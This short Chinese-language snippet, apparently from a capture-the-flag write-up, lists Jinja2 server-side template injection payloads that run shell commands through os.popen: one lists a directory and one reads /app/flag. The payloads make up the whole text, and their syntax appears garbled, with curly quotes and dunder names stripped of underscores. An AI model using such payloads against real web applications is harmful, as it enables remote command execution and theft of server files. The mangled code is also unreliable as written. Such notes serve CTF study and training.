命令执行 exp:目录读取 {{config.class.init.globals[‘os’].popen(‘ls …/’).read()}} 文件读取 exp:读取该目录app/flag的文件 {{config.class.init.globals[‘os’].popen(‘cat /app/flag’).read() }}